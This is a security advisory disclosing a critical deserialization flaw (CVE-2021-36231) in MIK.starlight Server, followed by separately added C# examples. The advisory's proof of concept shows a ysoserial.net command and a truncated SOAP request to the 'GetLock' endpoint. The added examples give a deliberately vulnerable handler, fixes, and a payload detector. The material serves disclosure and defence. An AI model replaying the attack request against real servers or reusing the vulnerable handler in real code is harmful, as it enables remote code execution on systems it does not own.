-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-035
Product: MIK.starlight Server
Manufacturer: MIK GmbH
Affected Version(s): -
Tested Version(s): 7.9.5.24363
Vulnerability Type: CWE-502: Deserialization of Untrusted Data
Risk Level: Critical
Solution Status: Open
Manufacturer Notification: 2021-07-02
Solution Date: -
Public Disclosure: 2021-08-27
CVE Reference: CVE-2021-36231
Author of Advisory: Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The MIK.starlight server is a web server that provides the basis for
the MIK.starlight suite.

The manufacturer describes the product as follows (see [1]):

"MIK.starlight suite offers exceptional customisable user interfaces
for data analytics and reporting. With our self-service business
intelligence solutions, users can easily create their own reports or
adapt existing ones, freeing up time and ensuring optimum flexibility."

Due to deserialization of untrusted user input, it is vulnerable to
remote code execution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The MIK.starlight server offers a multitude of functions that can be
called through a WCF endpoint. One of them is the function "GetLock".
The function deserializes user input in an insecure way and therefore
enables remote code execution. Other functions are exploitable in the
same way.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The tool YSoSerial.NET [4] is used to generate a payload executing an
operating system command:

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c ""

Next, the vulnerable function "GetLock" is called. The output of
YSoSerial.NET is sent in the parameter "serializedResourceSpec" and
will lead to the desired operating system command being executed on
the server. Note that an authenticated user is necessary.
POST /MikStarLightWCF/MikStarLightWCFService HTTP/1.1
Accept: */*
Accept-Language: de-DE
Content-Length: 5472
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IMikStarLightWCFService/GetLock"
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko
Host: IP:PORT
Pragma: no-cache
Connection: close
Proxy-Connection: Keep-Alive

false ########## ########## USERNAME AAEAAAD/////AQAAAAA....[...]....YAAAACRYAAAAKCw== 0 false

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS is not aware of a solution for the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-02: Vulnerability reported to manufacturer
2021-08-27: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for MIK.starlight
    https://www.mik.de/starlight-bi-suite-2/
[2] SySS Security Advisory SYSS-2021-035
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-035.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] YSoSerial.Net
    https://github.com/pwntester/ysoserial.net

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind.
Details of this security advisory may be updated in order to provide as
accurate information as possible. The latest version of this security
advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmEnTwQACgkQnfM5+UHd
IpAHlQ//R6xkXzIfWL+HYKY2gpyGgD36pxFpXGaRViNtamN5X3lTC0pgtS6nBf5H
+Qo2yolm5JGvnU7CMs0QfwuN9aw++NOVedjHtmQjwKg/SidGt+cpoDwBmxAKtwgo
NoLAsGroJoza8pnIHeSno7M+Em7T3sufNfngNmD2SKNlLw6zL940aafKmPwKPfnV
1GR6nDnPbXZJp876wwoVPDSeY7q5ZMTlGzRbJrTPYydmOtKKtCK19Z7YMXuM1iZD
tUKppBkN/YRjiQL11/sR8HyMCIALPNnRyd1SOL+mLOgYJ5BOLnDrAAP5pKRxpPBg
asZ9zw6PxWKfKxrQ3KSsnlHbkJZigJ9nggpSVrseP3JmnAuHCynxFPSFHsdXRABs
W+7PHI2th3BhAlzb6bwBrsN9f9VMW5YBuv2v+uqrkbHtI7JwwGnoCmrWbeB8r1Gc
2zfJEdjOBzqO8S51ww/IaFD2moq9WO9nvviBDrs6X2/gCuy16by60ZLsyMoftQBK
hec5f5bJ1NgKTVb4e4qQckbxbAS9tEzc3sOUrKPmBx0LRju4+qKUtLtURthZfZrB
/6i+W8dIM77X/3w6wcV4DODco/4qbLLQjHJ6AQZwcJxXkvCpfUQBh1E9BbL1BI/B
Qp9cnHJYtuGhu3Zaa8w/Eb0Du/7tD30nuX93J+33AIxNQRkEhiY=
=gJnP
-----END PGP SIGNATURE-----
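The "Vulnerability Details" section above names the pattern (a WCF operation feeding a user-supplied string into BinaryFormatter) but, as an advisory, shows no server-side code. The following C# sketch is an added example written for this page; it is not MIK's code and does not come from the advisory. The type ResourceSpec, its members, and the method names are assumptions; only the parameter name serializedResourceSpec and the use of BinaryFormatter are taken from the advisory. It places the vulnerable handler beside an allow-list SerializationBinder stopgap and beside the actual fix, a serializer that never reads a type name from the input.

```csharp
// Added example (not the vendor's code): the CWE-502 pattern behind a WCF
// operation such as GetLock, with a stopgap and a real fix.
// ASSUMED: the ResourceSpec type and the three method names; only the
// parameter name "serializedResourceSpec" and BinaryFormatter are from the advisory.
using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;

// Assumed payload type. [DataContract]/[DataMember] is what the fixed variant uses;
// [Serializable] is kept so the two BinaryFormatter variants compile against the same type.
[Serializable]
[DataContract]
public sealed class ResourceSpec
{
    [DataMember] public string Name { get; set; }
    [DataMember] public int Version { get; set; }
}

public static class LockService
{
    // VULNERABLE: BinaryFormatter instantiates whatever types the stream names.
    // An attacker-chosen object graph is constructed, and its gadget chain runs,
    // before execution ever reaches the cast to ResourceSpec. This is the pattern
    // the advisory describes.
    public static ResourceSpec GetLockVulnerable(string serializedResourceSpec)
    {
        byte[] raw = Convert.FromBase64String(serializedResourceSpec);
        var formatter = new BinaryFormatter();
        return (ResourceSpec)formatter.Deserialize(new MemoryStream(raw));
    }

    // STOPGAP: an allow-list SerializationBinder. Every class record in the stream
    // goes through BindToType before it is instantiated, so anything other than
    // ResourceSpec is refused up front. Microsoft's own guidance is that this
    // narrows the exposure but does not make BinaryFormatter safe; treat it as a
    // bridge until the call is removed.
    public static ResourceSpec GetLockWithBinder(string serializedResourceSpec)
    {
        byte[] raw = Convert.FromBase64String(serializedResourceSpec);
        var formatter = new BinaryFormatter { Binder = new ResourceSpecOnlyBinder() };
        return (ResourceSpec)formatter.Deserialize(new MemoryStream(raw));
    }

    // FIX: DataContractSerializer bound to exactly one known type. The type to
    // build is fixed at construction and never read from the input, so there is
    // no type-confusion gadget to trigger. The wire format becomes an XML
    // document instead of BinaryFormatter bytes, which is why this is a
    // coordinated client/server change rather than a drop-in replacement.
    public static ResourceSpec GetLockSafe(string resourceSpecXml)
    {
        var serializer = new DataContractSerializer(typeof(ResourceSpec));
        using (var stream = new MemoryStream(Encoding.UTF8.GetBytes(resourceSpecXml)))
        {
            return (ResourceSpec)serializer.ReadObject(stream);
        }
    }
}

public sealed class ResourceSpecOnlyBinder : SerializationBinder
{
    public override Type BindToType(string assemblyName, string typeName)
    {
        if (typeName == typeof(ResourceSpec).FullName)
            return typeof(ResourceSpec);

        // Throw rather than return null: a null result makes BinaryFormatter fall
        // back to its own type resolution, which is exactly what the allow list exists to prevent.
        throw new SerializationException(
            $"Type '{typeName}' from '{assemblyName}' is not permitted in serializedResourceSpec.");
    }
}
```

The order of the three methods is the order a defender should read them in: the first is what the advisory found, the second is what can be shipped the same day, the third is the state to end in. If other operations on the endpoint deserialize the same way, as the advisory says they do, the binder has to be attached to every one of them, whereas the DataContractSerializer change removes the class of bug from each operation it touches.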
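The PoC request above carries the payload as a base64 string whose first characters, "AAEAAAD/////", are the fixed header every BinaryFormatter stream begins with. That makes such payloads easy to spot in transit or in logs, regardless of which gadget follows. The detector below is an added example, not part of the advisory and not vendor code: it decodes only the first 24 base64 characters of each SOAP parameter and compares them to the 17-byte SerializationHeaderRecord. The SOAP body is constructed for the example; only the parameter name serializedResourceSpec and the header prefix come from the advisory, and the other element names are made up.

```csharp
// Added example (not from the advisory or the vendor): flag SOAP string
// parameters that carry a BinaryFormatter stream, for use in a WAF rule, a WCF
// message inspector, or a log scanner.
// ASSUMED: every element name in the sample body except serializedResourceSpec.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Xml.Linq;

public static class BinaryFormatterDetector
{
    // SerializationHeaderRecord that opens every BinaryFormatter stream:
    // RecordType 0, RootId 1, HeaderId -1, MajorVersion 1, MinorVersion 0.
    // Base64 of these 17 bytes is "AAEAAAD/////AQAAAAAAAAA=", matching the PoC prefix.
    private static readonly byte[] Header =
    {
        0x00,
        0x01, 0x00, 0x00, 0x00,
        0xFF, 0xFF, 0xFF, 0xFF,
        0x01, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00
    };

    // True when the value decodes to a BinaryFormatter header. Only the first
    // 24 base64 characters (18 bytes) are decoded, so a multi-kilobyte payload
    // does not cost a full decode just to be classified.
    public static bool IsBinaryFormatterPayload(string value)
    {
        if (string.IsNullOrWhiteSpace(value) || value.Length < 24)
            return false;

        byte[] decoded;
        try
        {
            decoded = Convert.FromBase64String(value.Substring(0, 24));
        }
        catch (FormatException)
        {
            return false; // not base64 at all, so not a BinaryFormatter blob
        }

        return decoded.Length >= Header.Length
            && decoded.Take(Header.Length).SequenceEqual(Header);
    }

    // Returns the local names of every leaf element in a SOAP body whose text
    // content looks like a BinaryFormatter stream. XDocument.Parse rejects DTDs
    // by default, so untrusted input cannot turn this check into an XXE sink.
    public static List<string> FindSuspiciousParameters(string soapXml)
    {
        XDocument doc = XDocument.Parse(soapXml);
        return doc.Descendants()
                  .Where(e => !e.HasElements && IsBinaryFormatterPayload(e.Value))
                  .Select(e => e.Name.LocalName)
                  .ToList();
    }

    public static void Main()
    {
        // CONSTRUCTED sample: a GetLock request whose serializedResourceSpec is a
        // BinaryFormatter header followed by filler bytes. This is not the
        // advisory's payload, and the element names around it are invented.
        const string sample =
            "<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\">" +
            "<s:Body><GetLock xmlns=\"http://tempuri.org/\">" +
            "<userName>USERNAME</userName>" +
            "<serializedResourceSpec>AAEAAAD/////AQAAAAAAAAAMAgAAAEFBQUFBQUFB</serializedResourceSpec>" +
            "<timeout>0</timeout>" +
            "</GetLock></s:Body></s:Envelope>";

        foreach (string name in FindSuspiciousParameters(sample))
            Console.WriteLine($"BinaryFormatter payload in parameter: {name}");
        // Expected: only serializedResourceSpec is reported; USERNAME and 0 are too short.
    }
}
```

Matching the header rather than a particular gadget name is deliberate: ysoserial.net offers many gadget chains, and all of them share this prefix when emitted with `-f BinaryFormatter`. A hit is a strong signal on an endpoint that has no legitimate reason to receive BinaryFormatter data, but it is a request-level heuristic, not a substitute for removing the deserialization call on the server.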